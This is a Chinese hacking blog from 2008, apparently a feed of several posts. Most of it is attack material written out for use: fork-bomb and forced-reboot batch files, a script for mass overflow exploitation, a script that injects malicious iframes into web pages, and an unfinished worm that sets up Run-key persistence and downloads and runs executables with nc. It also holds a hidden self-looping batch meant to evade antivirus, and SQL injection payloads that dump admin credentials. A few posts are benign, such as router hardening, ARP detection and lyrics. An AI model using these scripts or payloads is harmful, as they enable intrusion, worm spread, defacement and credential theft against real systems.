小丸子客客's Blog

教你建立一个别人不能碰的无敌文件夹

xwzkk@msn.com(小丸子客客) — Sun,11 May 2008 06:21:00 +0800

相信大家都遇到过自己的一些隐私文件不愿意让别人看到的情况吧，怎么解决呢？隐藏起来？换个名字？或者加密？这些办法都可以办到，其实还有一种方法，就是建立一个别人既不能进入又不能删除的文件夹，把自己的隐私文件放进去，别人就看不到啦，下面讲讲如何实现，很简单的。

　　第一步：在运行中输入cmd，回车，打开命令行窗口

　　第二步：在命令行窗口中切换到想要建立文件夹的硬盘分区，如D盘

　　第三步：输入MD 123＼回车，注意文件夹名后有2个小数点

　　OK，搞定，看看你的D盘下面是不是多了一个名为123.的文件夹了？它是既不能进入又不能被删除的！不信你就试试看吧

　　那么，如果自己想删除或者进入这个文件夹，又应该如何操作呢？同样也很简单。

　　如果想删除，在命令行窗口中输入rd 123＼回车，即可删除，当然删除前请确认里面的文件都是不需要的，不要删错了，呵呵。

　　如果想进入，在命令行窗口中输入start d：＼123＼（注意这里一定要是文件夹的绝对路径，否则无法打开即可打开此文件夹），你就可以随心所欲的把不想让别人看到的资料放进去啦

各种入侵批处理

xwzkk@msn.com(小丸子客客) — Sun,11 May 2008 06:18:04 +0800

第一个:让别人内存OVER(逼他重启)
@echo off
start cmd
%0

就这3行了

第二个:让对方重启指定次数(害人专用)
@echo off
if not exist c:\1.txt echo. >c:\1.txt & goto err1
if not exist c:\2.txt echo. >c:\2.txt & goto err1
if not exist c:\3.txt echo. >c:\3.txt & goto err1
if not exist c:\4.txt echo. >c:\4.txt & goto err1
if not exist c:\5.txt echo. >c:\5.txt & goto err1
goto err2
:err1
shutdown -s -t 0
:err2
上面可以让对方电脑重启5次后不在重启

第三个:自动踢人(3389肉机保护自己专用)
@echo off
logoff 1
del log.bat
logoff后面的1改成自己登陆的ID号,用query user查看

第四个: 批量自动溢出
@for /f %%i in (result.txt) do 42 %%i 58.44.89.158 521
先自己用NC监听端口,多开几个,然后指行,就自动溢出了

第五个:自动挂马改主页
@echo off
cls
rem 直接打批处理名字就有帮助
title 批量挂马,改首页(伤脑筋 QQ:447228437).
color A
set pan=%1
set ye=%2
set dai=%3
if "%pan%"=="" goto e1
if "%ye%"=="" goto e1
if "%dai%"=="" goto e1
if "%dai%"=="htm.txt" goto u1
forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE echo ^http://%dai%" width="0" height="0" frameborder="0"^> >>@path"
echo.
echo     代码全部插入完毕!!!!
echo.
pause
goto e1
:u1
echo 您现在的操作将使%pan%盘下,全部名为%ye%的内容变为您要更改的内容.
echo 这将是非常危险的,您真的要这样做? 回车却认,Ctrl+c取消操作.
pause
forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE copy %1\htm.txt @path /y"
echo.
echo   首页全部更改完必!!!!如果您发现没有替换成功,请将%ye%文件只读属性去掉.
echo.
pause
:e1
echo.
echo 本批处理只适用于2003系统,其他系统要使用,请将forfiles.exe拷贝至系统盘system32目录下
echo 用法:snj ^<搜索盘符^> ^<文件名^> ^<网马地址^>
echo 例子:snj d:\ index.asp www.doskey.net/mm.htm
echo 批处理将自动添加^标记
echo.
echo 如果您要更改全部网站的首页!请在批处理文件所在目录下,新建一个名为htm.txt的文本文件.
echo 然后将要更改的代码加COPY到里面保存.然后将命令的^<网马地址^>项输入为htm.txt即可.
echo 例子:snj d:\ index.asp htm.txt
echo.
echo 为了能准确无误执行批处理请最好先把记事本的"自动换行功能去掉",让命令保持在一行才能正确执行.
echo.
echo 使用此批处理造成一切后果本人概不负责,请大家谨慎使用!
echo.

第六个:利用批处理编写利用系统漏洞传播的蠕虫病毒
本来想写完后在做教程,要去学校了,所以先把思路告诉大家,大家可以先自己写写,我有时间写完发到群里.
这些是我未完成的批处理,大家可以在此基础上按照我下面说的思路继续写完
del c:\42.exe
del c:\nc.exe
del c:\ip.exe
echo dim wsh > %systemroot%\help\test.vbs
echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test.vbs
echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810 < %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs
echo dim wsh > %systemroot%\help\test2.vbs
echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test2.vbs
echo wsh.run "cmd /c start %systemroot%\help\good.bat",0 >> %systemroot%\help\test2.vbs
echo open 10.0.0.5 > %systemroot%\help\ftp.txt
echo open myyes >> %systemroot%\help\ftp.txt
echo 1 >> %systemroot%\help\ftp.txt
echo binary >> %systemroot%\help\ftp.txt
echo get 42.exe c:\42.exe >> %systemroot%\help\ftp.txt
echo get nc.exe c:\nc.exe >> %systemroot%\help\ftp.txt
echo get ip.exe c:\ip.exe >> %systemroot%\help\ftp.txt
echo bye >> %systemroot%\help\ftp.txt
echo echo Set xPost = CreateObject("Microsoft.XMLHTTP") ^>1.vbs > %systemroot%\help\or.txt
echo echo xPost.Open "GET","http://10.0.0.5/my.exe&quo...,0 ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo xPost.Send() ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo Set sGet = CreateObject("ADODB.Stream") ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.Mode = 3 ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.Type = 1 ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.Write(xPost.responseBody) ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.SaveToFile "d:\my.exe",2 ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo 1.vbs ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo my.exe ^>^>1.vbs >> %systemroot%\help\or.txt
echo Windows Registry Editor Version 5.00 > %systemroot%\help\1.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %systemroot%\help\1.reg
echo "SKYNET Personal FireWall"="F:\\系统安全工具\\FireWall\\PFW.exe" >> %systemroot%\help\1.reg
echo "1"="%systemroot%\\help\\test2.vbs" >> %systemroot%\help\1.reg

if not exist %systemroot%\help\good.bat copy good.bat %systemroot%\help\good.bat & %systemroot%\help\test2.vbs & del good.bat
regedit -s %systemroot%\help\1.reg
ftp -s:%systemroot%\help\ftp.txt
move c:\nc.exe %systemroot%\help\ /y
move c:\42.exe %systemroot%\help\ /y
move c:\ip.exe %systemroot%\help\ /y
%systemroot%\help\test.vbs
rem for /f %%i in (result1.txt) do set a=%%i
rem for /f %%j in (result.txt) do 42 %a% %%j 810
准备:
1:找一个反向连接的溢出攻击程序,如ms06040漏洞
2:找呀一个免费FTP空间,最好是送域名的
3:利用你所知道的高级语言编写一个,能生成随机范围IP地址和找到本机IP的工具.
思路:
用for语句对指定文本里的IP进行溢出,然后用if语句判断是否溢出成功, 如果成功开启一个NC监听端口,NC后面带一个 < 输入符号
输入的内容为下载本批处理文件,然后执行这个批处理.这样被溢出的机器就又会在他那里运行我门的批处理,从而到自动传播的目的.

把批处理生成的文件集中放到一个目录下,可以%systemroot%系统变量直接放到系统目录下
因为批处理运行后会闪出命令行窗口,我门可以利用VBS脚本来运行我们的批处理,这样就不会有任何窗口出现,脚本如下
echo dim wsh > %systemroot%\help\test.vbs
echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test.vbs
echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810 < %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs

生成随机IP工具的VB代码
Private Sub Form_Load()
Dim fso As New FileSystemObject
Dim a, b, c, d   As Integer
Dim ph, e As String
ph = App.Path & "\" & "ip.txt"
Randomize
a = Int(253 * Rnd + 1)
b = Int(253 * Rnd + 1)
c = Int(240 * Rnd + 1)
Open ph For Output As #1
For i = c To c + 7
   For j = 1 To 254
     e = a & "." & b & "." & i & "." & j
     Print #1, e
     DoEvents
   Next j
Next i
Close #1
Unload Me
End Sub

一个变态的垃圾清除的批处理和其流氓扩展

xwzkk@msn.com(小丸子客客) — Sun,11 May 2008 06:11:49 +0800

今天闲来无事，看到了一个垃圾清除的的BAT程序，觉得很实用便拿来看看，a.bat源代码如下：

：=============可以直接保存改名为a.bat==========
@echo offecho 正在清除系统垃圾文件，请稍等......
@@del /f /s /q %systemdrive%\*.tmp
@del /f /s /q %systemdrive%\*._mp
@del /f /s /q %systemdrive%\*.log
@del /f /s /q %systemdrive%\*.gid
@del /f /s /q %systemdrive%\*.chk
@del /f /s /q %systemdrive%\*.old
@del /f /s /q %systemdrive%\recycled\*.*
@del /f /s /q %windir%\*.bak
@del /f /s /q %windir%\prefetch\*.*
@rd /s /q %windir%\temp & md %windir%\temp
@del /f /q %userprofile%\cookies\*.*
@del /f /q %userprofile%\recent\*.*
@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
@del /f /s /q "%userprofile%\recent\*.*"
echo 清除系统LJ完成！
=========================

　　我用了一下，效果还真不错，速度快而且不重不漏!系统这下减了不少肥哈!最后我觉得这个BAT还是有点不很完善，要是能够自动检测系统中的垃圾文件并且删除那该多好啊!其实简单的很久一句话便实现了那个功能，在“echo 清除系统LJ完成!”后面加上一句 “call a.bat”就OK了，命令的意思大家都懂，我就不做解释了!我运行了一下，到是能够自动检测和删除了，而且关掉对话框也简单，直接关闭就行了!但是如果被当作入侵工具却又点太暴露，并且那个DOS框始终不能隐藏，很容易被发现.这该怎么办?想想批处理里面的命令，貌似没见到有隐藏对话框的用法(如果有请告诉指教一下!)，于是到网上找了一下，决定用VBS代码实现，于是又了下面的代码，其实也很简单，也就加了一句话进去：

=====可以直接保存改名为a.bat(一定要是a.bat哦具体说明原因你应该明白吧)===

@echo off
if "%1" == "h" goto begin
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
echo 正在清除系统垃圾文件，请稍等......
@@del /f /s /q %systemdrive%\*.tmp
@del /f /s /q %systemdrive%\*._mp
@del /f /s /q %systemdrive%\*.log
@del /f /s /q %systemdrive%\*.gid
@del /f /s /q %systemdrive%\*.chk
@del /f /s /q %systemdrive%\*.old
@del /f /s /q %systemdrive%\recycled\*.*
@del /f /s /q %windir%\*.bak
@del /f /s /q %windir%\prefetch\*.*
@rd /s /q %windir%\temp & md %windir%\temp
@del /f /q %userprofile%\cookies\*.*
@del /f /q %userprofile%\recent\*.*
@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
@del /f /s /q "%userprofile%\recent\*.*"
echo 清除系统LJ完成！
call a.bat

=========================保存以上部======================


　　　　哈哈，运行看看!什么效果?对话框消失了!打开任务管理器查看显示CPU运用：100% 看进程里面cmd.exe占用CPU：99本来想删除这个进程，但是哪晓得点右键准备去删除那个cmd.exe，没有想到不见了，然后仔细一看，其实cmd.exe没有不见，但是已经PID不一样了，也就表示一个循环已经进行完毕,还没等你来的结束进程就已经进入下一个循环，这时候有的朋友会想可以用taskkill命令来删除进程，但是PID几乎是每2秒换一次，你的速度有那么快?!目前我还没找到解决的办法(高手请指教)，无赖只好重新启动...哎!其实这都是雕虫小技，只不过是最基础的东西，但是有的时候最简单的也是最要命的!

　　你说，我们可以利用这个BAT做些什么：

　　1.因为bat文件可以躲过杀软!这样利用它的无限循环启动一些你自己的程序，当然咯，重复的循环安装时没有必要的，我只是打个比方，你可以自己改动代码达到自己的目的!

　　2.它循环使用消耗资源，如果这样的程序多弄几个，全部启动.你说服务器会怎么样?哈哈～～3.如果我把里面的删除垃圾文件的代码换成关闭防护墙/杀毒和开系统端口和服务的代码，那不是更好?

小丸子客客工作室长期承接以下业务

xwzkk@msn.com(小丸子客客) — Sun,11 May 2008 06:02:30 +0800

小丸子客客工作室长期承接以下业务:网站建设,域名注册,空间出租,服务器托管,DDOS抗压测试,网站服务器安全检测,大量网站源码出售,网吧无盘系统,程序破解,定制投票,有大量网站黄金广告位招租等多项业务!详情请联系QQ52322426,谢绝骚扰!

什么叫免杀?

xwzkk@msn.com(小丸子客客) — Thu,08 May 2008 17:43:30 +0800

免杀是通过一些手段给木马加上了一些伪装的东西来欺骗杀毒软件，使杀毒软件在查杀的时候检查不出来，特征码已被修改。
免杀的方法也有很多种，针对不同的情况我们运用不同的免杀方法。
⒈文件免杀：加花/修改文件特征码/加壳/修改加壳后的文件。
⒉内存免杀：修改特征码。
⒊行为免杀。

教你如何才能保护路由器防止遭黑客攻击

xwzkk@msn.com(小丸子客客) — Thu,08 May 2008 02:59:43 +0800

很多网络管理员还没有认识到他们的路由器能够成为攻击的热点，路由器操作系统同网络操作系统一样容易受到黑客的攻击。大多数中小企业没有雇佣路由器工程师，也没有把这项功能当成一件必须要做的事情外包出去。因此，网络管理员和经理人既不十分了解也没有时间去保证路由器的安全。下面是保证路由器安全的十个基本的技巧。

　　1.更新你的路由器操作系统:就像网络操作系统一样，路由器操作系统也需要更新，以便纠正编程错误、软件瑕疵和缓存溢出的问题。要经常向你的路由器厂商查询当前的更新和操作系统的版本。

　　2.修改默认的口令:据卡内基梅隆大学的计算机应急反应小组称，80%的安全事件都是由于较弱或者默认的口令引起的。避免使用普通的口令，并且使用大小写字母混合的方式作为更强大的口令规则。

　　3.禁用HTTP设置和SNMP(简单网络管理协议):你的路由器的HTTP设置部分对于一个繁忙的网络管理员来说是很容易设置的，但是，这对路由器来说也是一个安全问题。如果你的路由器有一个命令行设置，禁用HTTP方式并且使用这种设置方式，如果你没有使用你的路由器上的SNMP，那么你就不需要启用这个功能。思科路由器存在一个容易遭受GRE隧道攻击的SNMP安全漏洞。

　　4.封锁ICMP(互联网控制消息协议)ping请求:ping和其它ICMP功能对于网络管理员和黑客都是非常有用的工具。黑客能够利用你的路由器上启用的ICMP功能找出可用来攻击你的网络的信息。

　　5.禁用来自互联网的telnet命令:在大多数情况下，你不需要来自互联网接口的主动的telnet会话。如果从内部访问你的路由器设置会更安全一些。

　　6.禁用IP定向广播:IP定向广播能够允许对你的设备实施拒绝服务攻击。一台路由器的内存和CPU难以承受太多的请求。这种结果会导致缓存溢出。

　　7.禁用IP路由和IP重新定向:重新定向允许数据包从一个接口进来然后从另一个接口出去。你不需要把精心设计的数据包重新定向到专用的内部网路。

　　8.包过滤:包过滤仅传递你允许进入你的网络的那种数据包。许多公司仅允许使用80端口(HTTP)和110/25端口(电子邮件)。此外，你可以封锁和允许IP地址和范围。

　　9.审查安全记录:通过简单地利用一些时间审查你的记录文件，你会看到明显的攻击方式，甚至安全漏洞。你将为你经历了如此多的攻击感到惊奇。

　　10.不必要的服务:永远禁用不必要的服务，无论是路由器、服务器和工作站上的不必要的服务都要禁用。思科的设备通过网络

　　操作系统默认地提供一些小的服务，如echo(回波)， chargen(字符发生器协议)和discard(抛弃协议)。这些服务，特别是它们的UDP服务，很少用于合法的目的。但是，这些服务能够用来实施拒绝服务攻击和其它攻击。包过滤可以防止这些攻击。

让你快速学会Cookie与联合查询的注入

xwzkk@msn.com(小丸子客客) — Wed,07 May 2008 02:49:32 +0800

具体的原理与分析过程我就不写了，写起来一大片，大家看的心烦我写的头痛，我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。

cookie值是连接后才保存到本机的，也就是关IE后.
前提条件：一、网站没有过滤cookie方式的注入。
二、需事前了解数据库的管理员表段名，计算一下注入文件数据库查询语句在数据库中的列数。
打开数据库,找到Product这个表名，计算字段数为21个。管理员表名为admin 用户与密码字段名为username、password，呵呵没有注入文件，我们可以自己构造一个测试方便大家的理解。

构造如下简单注入ASP，当然我没作什么严格的过滤，也就是接受任何方式的提交。.
//调用数据库连接文件
<%
dim ID,sql,rs //定义函数
ID=trim(request("ID")) //接受任何形式的提交去空
if Id="" then //id为空的跳转
response.Redirect("Product.asp")
end if
sql="select * from Product where ID=" & ID & "" //记录集查询语句
Set rs= Server.CreateObject("ADODB.Recordset") //调用查询语句，跳到记录集id所在的指针
rs.open sql,conn,1,3 //增加记录的表达方式 1,3可读写, 乐观锁定
if rs.bof and rs.eof then //提示 BOF 或 EOF，程序出错判断
response.Write("

找不到此产品

")
else
%>

<%=rs("Title")%>

//反回指针处的内容，选取的字段与管理员的用户密码类型要相同

<%=rs("product_id")%>

<%=rs("Price")%>

<%
end if
rs.close //清空
set rs=nothing
call CloseConn
%>
找前图中的ID=55

构造联合查询语句
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin 将6，2分别用username、password替换

来试试cookie注入。找个目标，注入点结构与前面相近就不再分析了,仅过滤了post与get注入.

步骤一：重新打开IE，先连接到需注入的网站http://127.0.0.1/nf，也就是去除前面的链接值。注意:不要直接在前面图中的链接处操作,可以会不成功噢。
步骤二：清空地址处IE，再次在地址中加入如下
javascript:alert(document.cookie="id="+escape("56 and 1=2 union select 1,
2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))
再次清空IE打入http://127.0.0.1/nf/ProductShow.asp

步骤四：重复步骤一.注意此步骤必需操作,很多人失败就在这里。
步骤五：清空地址处IE，再次在地址中如下代码
javascript:alert(document.cookie="id="+escape("56 and 1=2 union select 1,
username,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))

步骤六、再次清空地址处IE。http://127.0.0.1/nf/ProductShow.asp

好了全文结束。尽可能的多写文章与大家分享吧

用命令行查找ARP病毒母机

xwzkk@msn.com(小丸子客客) — Wed,07 May 2008 02:27:03 +0800

如何能够快速检测定位出局域网中的ARP病毒电脑？

面对着局域网中成百台电脑，一个一个地检测显然不是好办法。其实我们只要利用ARP病毒的基本原理：发送伪造的ARP欺骗广播，中毒电脑自身伪装成网关的特性，就可以快速锁定中毒电脑。可以设想用程序来实现以下功能：在网络正常的时候，牢牢记住正确网关的IP地址和MAC地址，并且实时监控着来自全网的ARP数据包，当发现有某个ARP数据包广播，其IP地址是正确网关的IP地址，但是其MAC地址竟然是其它电脑的MAC地址的时候，这时，无疑是发生了ARP欺骗。对此可疑MAC地址报警，在根据网络正常时候的IP－MAC地址对照表查询该电脑，定位出其IP地址，这样就定位出中毒电脑了。下面详细说一下如何利用命令行方式检测ARP中毒电脑的方法.　

命令行法　

这种方法比较简便，不利用第三方工具，利用系统自带的ARP命令即可完成。当局域网中发生ARP欺骗的时候，ARP病毒电脑会向全网不停地发送ARP欺骗广播，这时局域网中的其它电脑就会动态更新自身的ARP缓存表，将网关的MAC地址记录成ARP病毒电脑的MAC地址，这时候我们只要在其它受影响的电脑中查询一下当前网关的MAC地址，就知道中毒电脑的MAC地址了，查询命令为 ARP －a，需要在cmd命令提示行下输入。输入后的返回信息如下：　　

Internet Address Physical Address Type

192.168.0.1 00-50-56-e6-49-56 dynamic　　

这时，由于这个电脑的ARP表是错误的记录，因此，该MAC地址不是真正网关的MAC地址，而是中毒电脑的MAC地址！这时，再根据网络正常时，全网的IP—MAC地址对照表，查找中毒电脑的IP地址就可以了。由此可见，在网络正常的时候，保存一个全网电脑的IP—MAC地址对照表是多么的重要。可以使用nbtscan工具扫描全网段的IP地址和MAC地址，保存下来，以备后用。
=============
arp -a   查看MAC
ARP -D   清空ARP缓存
arp -s   绑定网关，格式为   arp -s ip mac   :ARP -S 网关IP 网关MAC

歌曲:感动天感动地

xwzkk@msn.com(小丸子客客) — Tue,06 May 2008 05:48:21 +0800

感动天感动地

一开始我以为爱本来会很容易
所以没有经过允许就把你放心底
直到后来有一天你和他走在一起
我才发现原来爱情不是真心就可以

我感动天感动地怎么感动不了你
明明知道没有结局却还死心塌地
我感动天感动地怎么感动不了你
总相信爱情会有奇迹都是我骗自己

以为自己不再去想你
保持不被刺痛的距离
就算早已忘了我自己
却还想要知道你的消息

---end---

SQL注入的不常见方法

xwzkk@msn.com(小丸子客客) — Tue,06 May 2008 01:46:17 +0800

全站文章系统采用FSO静态生成的HTML文件来显示，这样做的好处一来可以减轻服务器负担，提高访问速度。二是阻止SQL注入式的攻击...

文章系统原理：
全部文章均在数据库存有一个副本。另处根据模板生成一个HTML页面。
攻击方法：查看源文件，里面是否有通过JS来调用页面。
如调用来更新文章的浏览次数。

我们就可以来试一下可否注入：
http://服务器域名/count.asp?id=1552'
看是否出错。如出错说明有注入漏洞，可采取正常攻击。

在本机建立一个post.htm的文件和log.txt的文本文件（用于记录用）

post.htm内容：方便输入…
复制内容到剪贴板代码:
<iframe name=p src=# width=800 height=350 frameborder=0></iframe>
<br>
<form action=http://test.com/count.asp target=p>
<input name="id" value="1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--" style="width:750">
<input type=submit value=">>>">
<input type=hidden name=fno value="2, 3">
</form>
对于SQL SERVER服务器可以这样判断：在1552后加一分号，如正常可能是SQL SERVER对于这类数据库可以先建一个表id=1552;create table aaa(aaa char(20));--

然后插入一条记录：id=1552;insert into aaa values('test');--

再之后枚举出他的数据表名：

id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--

这是将第一个表名更新到aaa的字段处。

id=1552 and exists(select * from aaa where aaa>5)就会报错，多数情况会将表名直接读出：Microsoft OLE DB Provider for SQL Server 错误 '80040e07'，将 varchar 值 'vote' 转换为数据类型为 int 的列时发生语法错误。

/search.asp，行21

其中vote就是表名：

也可以先猜出一个表名，再把(select top 1 name from sysobjects where xtype='u' and status>0)的值更新到那个表的一条记录中去。通过网页显示。

读出第一个表，第二个表可以这样读出来（在条件后加上 and name<>'刚才得到的表名'）。

id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--

然后id=1552 and exists(select * from aaa where aaa>5)读出第二个表，一个个的读出，直到没有为止。

读字段：

id=1552;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));--

然后id=1552 and exists(select * from aaa where aaa>5)出错，得到字段名id=1552;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));--然后id=1552 and exists(select * from aaa where aaa>5)出错，得到字段名。

……类推……